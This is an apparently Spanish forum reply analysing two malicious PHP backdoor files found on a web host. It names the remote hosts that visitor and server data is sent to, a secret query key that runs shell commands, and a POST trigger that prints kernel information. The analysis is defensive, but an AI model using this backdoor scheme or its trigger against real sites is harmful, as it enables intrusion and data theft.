Veamos, borra esos archivos, yo tenia unos parecidos en mi host junto con una linda pagina que aun conservo xD.. claro, no me fije que lo tenia asi por meses pq esa carpeta no la usaba desde hacia mucho.

La primera direccion que se trata de incluir es:
http://bis.iframe.ru/master.php?r_addr={ip_del_server}&url={url_del_ser ver}
Donde:
{ip_del_server} = ip2long(getenv(REMOTE_ADDR))
{url_del_server} = base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg

Y en las lineas anteriores es donde se forma la cadena $user_auth y $log_flg, en fin..

Luego, si esta puesta la cadena 'a3kfj39fsj2' en la url, ejecutara (o tratara) el comando que ahi este:
Ej: date.php?a3kfj39fsj2=ls <- listado de archivos
Y al final intenta mostrar, si $_POST['l'] es igual a "special", un uname -a, q da la info del kernel que esta corriendo la maquina

Ahora, el time.php
Primero empieza a juntar variables que se componen de diversos aspectos del visitante/servidor:
$_SERVER["HTTP_HOST"]
$_SERVER["SERVER_NAME"]
$_SERVER["REQUEST_URI"]
$_SERVER["PHP_SELF"]
$_SERVER["QUERY_STRING"]
$_SERVER["HTTP_REFERER"]
$_SERVER["HTTP_USER_AGENT"]
$_SERVER["REMOTE_ADDR"]

Luego, las une todas en la cadena $str, y codificando cada una en base64. Cuando ya esta la cadena completa, trata de incluir una direccion:
http://user9.mshtml.ru/?{cadena}
Donde {cadena} es la cadena formada anteriormente con todas las varibles. Si esa url no se puede incluir, entonces lo intenta con otra
http://user7.htmltags.ru/?{cadena}

Y taran, listo todo o.o.. en esas ultimas paginas debo suponer que es donde se guarda la info que se recoge